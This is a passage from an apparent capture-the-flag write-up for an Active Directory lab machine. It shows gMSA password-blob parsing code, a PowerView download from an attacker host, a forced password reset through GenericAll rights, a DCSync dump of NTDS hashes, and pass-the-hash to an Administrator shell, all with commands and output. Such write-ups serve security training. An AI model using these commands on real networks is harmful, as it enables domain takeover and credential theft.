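    header = struct.pack("<HHIHHHH", 1, 0, upi_off + 8, cur_off, prev_off, qpi_off, upi_off)
    return header + body + intervals


if __name__ == "__main__":
    print(parse_managed_password_blob(build_blob("password", "old-one")))
```

The hash returned for the current password is what gMSADumper prints and what pass-the-hash tooling expects; the previous password is kept in the blob so services still holding the old one keep working across the rollover.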
Force change password with GenericAll rights
With that credential in hand, BIR-ADFS-GMSA's GenericAll over Tristan.Davies lets us reset his password using PowerView, fetched from our attacker host:
Invoke-WebRequest -Uri "http://10.10.14.11/PowerView-ofs.ps1" -OutFile "C:\Users\Sierra.Frye\Documents\PowerView-ofs.ps1" # Pull PowerView from the attacker machine
ipmo .\PowerView-ofs.ps1 # Import-Module
$UserPassword = ConvertTo-SecureString 'Ilove4!' -AsPlainText -Force # New password for the target account
Set-DomainUserPassword -Identity Tristan.Davies -AccountPassword $UserPassword -Credential $cred # Reset as BIR-ADFS-GMSA, which holds GenericAll on the user
DCSync attack
Tristan.Davies is a Domain Admin, so with his new password we can DCSync the domain (secretsdump.py pulls the NTDS secrets through DRSUAPI replication):
➤ secretsdump.py 'Tristan.Davies':'Ilove4!'@search.htb
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x697a8e5d7f1607bd69d577ff42336dd5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9c7bf72260e8eef29e9cfeb60f94fc56:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:cd69d23e4383daa5b0f42d29dba9529a:::
Finally, pass-the-hash with the domain Administrator NT hash from the dump:
➤ wmiexec.py search.htb/'Administrator'@10.10.11.129 -hashes ':5e3c0abbe0b4163c5612afe25c69ced6'
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
search\administrator